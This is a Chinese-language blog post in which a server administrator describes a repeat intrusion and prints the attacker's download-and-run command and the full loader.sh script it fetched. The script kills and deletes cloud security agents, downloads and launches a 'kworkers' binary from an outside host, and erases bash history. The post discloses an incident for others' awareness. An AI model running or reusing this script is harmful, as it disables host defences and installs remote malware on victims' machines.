服务器被入侵,执行了2个非常危险的命令
机器之前中过木马,手动清除了,以为没事了,就没重装系统
今天发现又被登录,执行了2个命令
sh -c 'curl | http://m.windowsupdatesupport.org/d/loader.sh|sh'
sh -c \'curl | http://m.windowsupdatesupport.org/d/loader.sh|sh\'
可惜2个命令没有执行成功,因为机器被我屏蔽外网了
用浏览器下载了loader.sh,脚本如下:
ps aux | grep -v grep | grep 'aegis' | awk '{print $11}' | xargs dirname | xargs rm -rf
ps aux | grep -v grep | grep 'hids' | awk '{print $11}' | xargs dirname | xargs rm -rf
ps aux | grep -v grep | grep 'cloudwalker' | awk '{print $11}' | xargs dirname | xargs rm -rf
ps aux | grep -v grep | grep 'titanagent' | awk '{print $11}' | xargs dirname | xargs rm -rf
ps aux | grep -v grep | grep 'edr' | awk '{print $2}' | xargs -I {} kill -9 {}
ps aux | grep -v grep | grep 'aegis' | awk '{print $2}' | xargs -I {} kill -9 {}
ps aux | grep -v grep | grep 'Yun' | awk '{print $2}' | xargs -I {} kill -9 {}
ps aux | grep -v grep | grep 'hids' | awk '{print $2}' | xargs -I {} kill -9 {}
ps aux | grep -v grep | grep 'edr' | awk '{print $2}' | xargs -I {} kill -9 {}
ps aux | grep -v grep | grep 'cloudwalker' | awk '{print $2}' | xargs -I {} kill -9 {}
ps aux | grep -v grep | grep 'titanagent' | awk '{print $2}' | xargs -I {} kill -9 {}
ps aux | grep -v grep | grep 'sgagent' | awk '{print $2}' | xargs -I {} kill -9 {}
ps aux | grep -v grep | grep 'barad_agent' | awk '{print $2}' | xargs -I {} kill -9 {}
ps aux | grep -v grep | grep 'hostguard' | awk '{print $2}' | xargs -I {} kill -9 {}
###此处是服务器的监控程序,入侵者想删掉我们机器的监控程序
rm -rf /usr/local/xxx
rm -rf /usr/local/xxxx
rm -rf /usr/local/xxxx
ps aux | grep -v grep | grep 'kworkers' | awk '{print $2}' | xargs -I {} kill -9 {}
domainroota=m.windowsupdatesupport.org
mkdir ~/.git
mkdir ./.git
gitdir=~/.git
if [ -d ~/.git ]; then
gitdir=~/.git
fi
if [ -d ./.git ]; then
gitdir=./.git
fi
curl http://$domainroota/d/kworkers -o $gitdir/kworkers
chmod 777 $gitdir/kworkers
if [ -e /.dockerenv ]
then
$gitdir/kworkers
else
nohup $gitdir/kworkers >>$gitdir/.log&
fi
sed -i '/$domainroota/d' ~/.bash_history
服务器被入侵,执行了2个非常危险的命令相关推荐
- 阿里云服务器被入侵执行MoneroOcean(门罗币)挖矿脚本
为学习使用Redis,在阿里云Linux服务器上安装了redis并且后台运行,开放了默认端口,而且没有设置访问密码,当天晚上被执行了恶意脚本. 恶意代码如下,分享一下: #!/bin/bash us= ...
- 永远不要在Linux执行的10个最危险的命令
2019独角兽企业重金招聘Python工程师标准>>> Linux命令行佷有用.很高效,也很有趣,但有时候也很危险,尤其是在你不确定你自己在正在做什么时候.这篇文章并不打算引来你对L ...
- 在Linux执行的10个最危险的命令
Linux命令行佷有用.很高效,也很有趣,但有时候也很危险,尤其是在你不确定你自己在正 在做什么时候.这篇文章并不打算引来你对Linux或linux 命令行的愤怒.我们只是想让你意识到在你运行某些命令 ...
- 服务器被入侵了?反手溯源出入侵者画像【网络安全】
前序 手机上发来服务器被入侵的消息,这令人感到一脸懵,这个服务器也不是啥重要东西,上面啥也没有怎么还会被搞?被人搞了那也不能示弱了, 排查后门 开机进行分析.一登陆进服务器就想起来了之前做测试的时候直 ...
- 管理员请注意 一条后门病毒攻击链正在针对服务器发起入侵
我们通过排查相关威胁信息发现,上述后门病毒从去年8月份开始,影响范围明显扩大,不排除后续黑客还会尝试其它渗透方式达到入侵的目的. 火绒查杀图 火绒拦截图 工程师溯源发现,黑客通过弱口令等方式入侵服务器 ...
- linux的FTP服务器搭建及FTP服务器的入侵和防御
FTP 是File Transfer Protocol(文件传输协议)的英文简称,而中文简称为"文传协议".用于Internet上的控制文件的双向传输. 与大多数Internet服 ...
- 记录一次服务器被入侵(恶意挖矿)的问题
一.问题描述 阿里云服务器这段时间一直给我发送报警信息,如下图所示: 二.问题的解决过程 我对这些报警都没太在意,直到有天我登录宝塔界面,发现登录的过程非常的卡顿,用xshell连接服务器(包括敲命令 ...
- 记一次服务器被入侵,没想到我轻松搞定了它~
作者:tlanyan 链接:https://itlanyan.com/server-being-hacked-log/ 常在河边走,哪能不湿鞋.自认为安全防范意识不错,没想到服务器被入侵挖矿的事情也能 ...
- 看服务器被入侵如何排查?如何防止服务器被入侵?
遇到很多次客户服务器被入侵的情况,有些服务器被植入木马后门.有些被检查出有挖矿程序.有些发现登录密码不对,被恶意登录修改了密码,遇到了服务器被入侵的情况应第一时间联系服务商售后处理将损失降低到最低程度 ...
最新文章
- Science:中科院植物所马克平组揭示土壤真菌与树木密度的关系
- 在浏览器上也能训练神经网络?TensorFlow.js带你玩游戏~
- 网工路由基础(2)路由选路原理
- ajax,jsonp,axios面试题
- javascript Date类型 学习笔记
- python list去重函数_python 列表函数
- Linux环境下查看CPU资源的命令
- 数据库备份与还原的过程中介质集有2个介质簇,但只提供了1个。必须提供所有成员...
- catia中的螺旋伞齿轮画法_使用CATIA绘制斜齿轮(直齿轮)得画法教程.doc
- 神经网络与机器学习导言笔记——网络结构与知识表示
- h5项目解决苹果手机iOS系统字体放大问题
- Linux 文件压缩和解压命令 (压缩、解压)
- 原生android ui设计,在拟物和扁平之间寻找平衡 原生安卓UI设计进化史
- 怎么大量转换图片格式为tiff
- SVN update拒绝访问,clean up失败
- 使用LaTeX的语言风格植入MathType公式的两种办法
- 基于卷积和递归神经网络的物联网流量分类器
- c语言汉诺塔课设计报告,汉诺塔游戏的设计
- 如何重装oracle数据库,oracle数据库的重装
- Java简单知识点小结